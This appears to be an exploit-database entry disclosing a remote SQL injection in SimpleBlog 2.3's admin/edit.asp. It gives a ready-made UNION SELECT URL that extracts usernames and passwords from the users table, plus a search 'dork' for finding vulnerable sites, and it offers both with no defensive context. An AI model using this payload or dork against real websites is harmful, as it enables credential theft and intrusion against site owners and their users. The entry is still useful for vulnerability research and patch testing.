id: 1215
date: 11/26/2006
title: SimpleBlog <= 2.3 (admin/edit.asp) Remote SQL Injection Vulnerability
author: bolivar
cves: 

=====================================================================
SimpleBlog <= 2.3 (admin/edit.asp) Remote SQL Injection Vulnerability
=====================================================================



# Title   :  simpleblog <= v 2.3 (/admin/edit.asp) Remote SQL Injection Vulnerability
# Author  :  bolivar
# Dork    :  "SimpleBlog 2.3 by 8pixel.net"

---------------------------------------------------------------------------

http://[target]/[path]/admin/edit.asp?id=-1+union+select+0,uUSERNAME,uPASSWORD,0,0,0,0,0,0+from+t_users

---------------------------------------------------------------------------
# Just for Fun!!



#  0day.today [2023-03-24]  #